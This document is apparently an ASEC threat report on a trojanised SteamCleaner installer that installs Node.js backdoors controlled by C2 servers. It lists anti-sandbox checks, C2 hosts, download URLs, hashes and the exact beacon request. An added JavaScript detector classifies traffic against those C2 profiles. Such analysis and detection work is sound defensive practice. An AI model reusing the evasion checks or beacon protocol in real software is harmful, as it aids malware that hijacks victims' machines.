Distribution of Backdoor Malware with Legitimate Signature, Disguised as Steam Cleanup Tool
Multiple cases have been reported of malware being distributed under the guise of “SteamCleaner”, a tool for cleaning up the client of the popular game platform Steam. Once a system is infected, a malicious Node.js script resides on the user’s PC and communicates periodically with the C2 server, allowing the threat actor to execute commands.
SteamCleaner is an open-source tool that cleans up junk files in the Steam client. It has not been updated since September 2018.

Figure 1. SteamCleaner source code published on GitHub
The threat actor added malicious code to the original source, built it, packaged it with an Inno Setup installer, and distributed the installer signed with a valid certificate. When the installer is executed, the code added by the threat actor runs and installs malware that allows remote command execution.

Figure 2. Malware signature and properties
AhnLab SEcurity intelligence Center (ASEC) has confirmed that this malware is distributed by redirecting users from a website disguised as a download page for illegal software such as cracks and keygens to a GitHub repository where the malware is hosted. Compared with the previously observed distribution, this malware is being pushed more actively and through more channels, indicating that the same malware is now spread via a variety of distribution routes.

Figure 3. Example of a Proxyware malware distribution page
Distribution URL
- hxxps://raw.githubusercontent[.]com/erindaude/3O/main/Setup.exe
In addition to the above URL, the threat actor created multiple repositories under a single GitHub account and uploaded multiple instances of the same type of malware to them for distribution.
The malware is downloaded under the file name ‘Setup.exe’. When executed, it installs the modified SteamCleaner into the C:\Program Files\SteamCleaner\ directory and then runs it. Unlike the installer, this installed file is not signed.

Figure 4. Malware installation path
Comparing the legitimate SteamCleaner executable with the modified version shows that the original code has been kept and that classes and methods performing the malicious behavior have been added.

Figure 5. Structure of Proxyware (left) and normal file (right)
The added code contains multiple anti-sandbox checks: it inspects system information, port counts (via WMI queries), modules loaded in the process, the presence of specific files and paths, running processes, and the timing of Sleep operations. When a sandbox environment is detected, only the original program runs and no malicious behavior is performed.

Figure 6. Screen after executing malware
| Check Target | Item |
|---|---|
| Module | cmdvrt32.dll, cmdvrt64.dll, kernel32.dll:wine_get_unix_file_name(), SbieDll.dll, cuckoomon.dll, SxIn.dll |
| File | balloon.sys, netkvm.sys, vioinput, viofs.sys, vioser.sys, VBoxMouse.sys, VBoxGuest.sys, VBoxSF.sys, VBoxVideo.sys, vmmouse.sys, vboxogl.dll |
| WMI Query | SELECT * FROM Win32_PortConnector; Select * from Win32_ComputerSystem |
| Path | [Directory] C:\Program Files\VMware, C:\Program Files\oracle\virtualbox guest additions; [Named Pipe] \\.\pipe\cuckoo, \\.\HGFS, \\.\vmci, \\.\VBoxMiniRdrDN, \\.\VBoxGuest, \\.\pipe\VBoxMiniRdDN, \\.\VBoxTrayIPC, \\.\pipe\VBoxTrayIPC |
| Process | vboxservice, VGAuthService, vmusrvc, qemu-ga |

Table 1. Summary of anti-sandbox techniques
Next, it decrypts and executes a PowerShell command stored in encrypted form inside the malware. This command installs Node.js on the system, downloads two different malicious Node.js scripts from two C2 servers, installs them, and registers them with the Task Scheduler. The registered tasks run automatically at system boot and every hour thereafter.
Both scripts can execute commands received from the C2. When connecting to the C2 to receive commands, they send information about the infected system, which the threat actor can use in future attacks. On connecting, the following JSON structure is sent to the /d path, and execution results are sent to the /e path. The only differences between the two scripts are the User-Agent header and the agent_version field in the data; they are summarized in the tables below.
POST /d HTTP/1.1
host: aginscore.com
connection: keep-alive
Content-Type: application/json
accept: */*
accept-language: *
sec-fetch-mode: cors
user-agent: node
accept-encoding: br, gzip, deflate
content-length: 271
{
"os_type": "Windows_NT",
"os_name": "win32",
"os_release": "10.0.22631",
"os_version": "Windows 11 Pro",
"os_hostname": "DESKTOP-xxxxxxx", //PC name
"os_arch": "x64",
"machine_id": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx", //device GUID
"agent_version": "17.2.7",
"session_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" //random hex
}
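The beacon above is easy to recognise in proxy or network logs once its fixed parts are known: a POST to /d or /e carrying exactly these nine string fields, together with the User-Agent, agent_version and C2 host of one of the two scripts. The following added example, which is not code from the ASEC post or from the malware, parses a raw HTTP request and classifies it against those two profiles. The profile values come from the analysis and its tables; the sample requests and the two-indicator threshold are assumptions of this example, and a lone "user-agent: node" is deliberately not enough to flag a request, since any Node.js HTTP client sends it.

```javascript
// Added example: classify captured HTTP requests against the two agent profiles.
// Profile values are from the ASEC analysis; the samples below are constructed.
const BEACON_PATHS = ['/d', '/e'];
const BEACON_FIELDS = ['os_type', 'os_name', 'os_release', 'os_version',
  'os_hostname', 'os_arch', 'machine_id', 'agent_version', 'session_id'];

const PROFILES = [
  { name: 'script1 (downloader)', userAgentPrefix: 'insomnia/', agentVersion: '0.3.0',
    hosts: ['rt-guard.com', '4tressx.com', 'kuchiku.digital', 'screenner.com'] },
  { name: 'script2 (command executor)', userAgentPrefix: 'node', agentVersion: '17.2.7',
    hosts: ['aginscore.com'] },
];

// Split a raw HTTP/1.1 request (CRLF or LF line endings) into method, path,
// lower-cased headers and a parsed JSON body (null when absent or not JSON).
function parseRequest(raw) {
  const [head, ...rest] = raw.split(/\r?\n\r?\n/);
  const lines = head.split(/\r?\n/);
  const [method, path] = lines[0].trim().split(/\s+/);
  const headers = {};
  for (const line of lines.slice(1)) {
    const i = line.indexOf(':');
    if (i > 0) headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  let body = null;
  const text = rest.join('\n\n').trim();
  if (text) { try { body = JSON.parse(text); } catch (e) { body = null; } }
  return { method, path, headers, body };
}

// Returns { profile, indicators } when at least two independent indicators of one
// profile are present (known C2 host, User-Agent, agent_version, or the full beacon
// schema posted to /d or /e); otherwise null.
function classifyBeacon(raw) {
  const req = parseRequest(raw);
  if (req.method !== 'POST' || !req.body || typeof req.body !== 'object') return null;
  const host = (req.headers.host || '').toLowerCase().split(':')[0];
  const ua = (req.headers['user-agent'] || '').toLowerCase();
  const hasSchema = BEACON_FIELDS.every((f) => typeof req.body[f] === 'string');
  for (const p of PROFILES) {
    const indicators = [];
    if (p.hosts.includes(host)) indicators.push(`known C2 host ${host}`);
    if (ua.startsWith(p.userAgentPrefix)) indicators.push(`user-agent "${ua}"`);
    if (req.body.agent_version === p.agentVersion) indicators.push(`agent_version ${p.agentVersion}`);
    if (hasSchema && BEACON_PATHS.includes(req.path)) indicators.push(`beacon schema posted to ${req.path}`);
    if (indicators.length >= 2) return { profile: p.name, indicators };
  }
  return null;
}

// Constructed samples; hostnames, GUIDs and session IDs are placeholders.
const SAMPLE_SCRIPT2 = [
  'POST /d HTTP/1.1', 'host: aginscore.com', 'content-type: application/json',
  'user-agent: node', '',
  JSON.stringify({ os_type: 'Windows_NT', os_name: 'win32', os_release: '10.0.22631',
    os_version: 'Windows 11 Pro', os_hostname: 'DESKTOP-XXXXXXX', os_arch: 'x64',
    machine_id: '00000000-0000-0000-0000-000000000000', agent_version: '17.2.7',
    session_id: '00'.repeat(16) }),
].join('\r\n');

const SAMPLE_SCRIPT1 = [
  'POST /e HTTP/1.1', 'host: rt-guard.com', 'content-type: application/json',
  'user-agent: insomnia/2023.4.0. Windows', '',
  JSON.stringify({ os_type: 'Windows_NT', os_name: 'win32', os_release: '10.0.19045',
    os_version: 'Windows 10 Pro', os_hostname: 'DESKTOP-YYYYYYY', os_arch: 'x64',
    machine_id: '00000000-0000-0000-0000-000000000000', agent_version: '0.3.0',
    session_id: 'ff'.repeat(16) }),
].join('\r\n');

const SAMPLE_BENIGN = [
  'POST /d HTTP/1.1', 'host: api.example.com', 'content-type: application/json',
  'user-agent: node', '', JSON.stringify({ query: 'status' }),
].join('\r\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of [SAMPLE_SCRIPT2, SAMPLE_SCRIPT1, SAMPLE_BENIGN]) {
    console.log(JSON.stringify(classifyBeacon(s)));
  }
}
```

The schema check is the durable part of this detector: the hosts and the agent_version values will change between campaigns, but the nine-field fingerprint is what the C2 expects, so it is the indicator least likely to be rotated.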
The first Node.js script downloads a file from a specific URL and then executes it through an external process such as CMD or PowerShell. The agent_version field in the table below is part of the JSON data sent to the C2 and is presumed to be an identifier the threat actor uses to manage malware versions.
| Item | Value |
|---|---|
| Installation Path | C:\WCM\{UUID}\UUID |
| Task Scheduler Path | Microsoft/Windows/WCM/WiFiSpeedScheduler |
| Download URL | hxxps://rt-guard[.]com/updates/KB80164432 |
| Malware MD5 | 5ea776ca7dccac71138a6e92a4f5c934 (Downloader/JS.Proxyware.SC291258) |
| C2 | rt-guard[.]com, 4tressx[.]com, kuchiku[.]digital, screenner[.]com |
| Data Sent: User-Agent | insomnia/2023.4.0. Windows |
| Data Sent: agent_version | 0.3.0 |

Table 2. Summary of the malicious script (1)
The second Node.js script receives commands from the C2, executes them, and sends the output back to the C2. Whereas the first script takes a URL as an argument, downloads the content from it, and runs that content through an external process such as CMD or PowerShell, the second receives the commands themselves and runs them with exec(), the shell execution function of Node.js’s child_process module. It is also more heavily obfuscated, which makes analysis more difficult.
| Item | Value |
|---|---|
| Installation Path | C:\WindowsSetting\{UUID}\UUID |
| Task Scheduler Path | Microsoft/Windows/Diagnosis/RecommendedDiagnosisScheduler |
| Download URL | hxxps://uuu.rqfefxsa[.]xyz/cab.js |
| Malware MD5 | 804957e501ee0443632ea675353326d4 (Trojan/JS.Proxyware.SC295915) |
| C2 | aginscore[.]com |
| Data Sent: User-Agent | node |
| Data Sent: agent_version | 17.2.7 |

Table 3. Summary of the malicious script (2)
At the time of analysis, both scripts received only empty commands from the C2, so their final behavior could not be confirmed. However, similar malware observed in the past responded to C2 commands by installing Proxyware. Because the malware can execute arbitrary commands, it can also install other types of malware at the threat actor’s discretion, so caution is advised.
For information on previously confirmed cases of Proxyware distribution, please refer to the ASEC blog.
- Proxyware Malware Being Distributed Through YouTube Video Download Site
- Proxyware Malware Being Distributed Through YouTube Video Downloading Site – 2
As seen above, malware that is carefully disguised as a legitimate program or utility to conceal its malicious behavior continues to be distributed, so extra caution is advised. In particular, files downloaded from untrusted websites or communities should not be executed, and illegal programs such as cracks and keygens should be avoided. Such files are frequently used as malware distribution channels and can lead to information theft, remote control, and the installation of additional malware.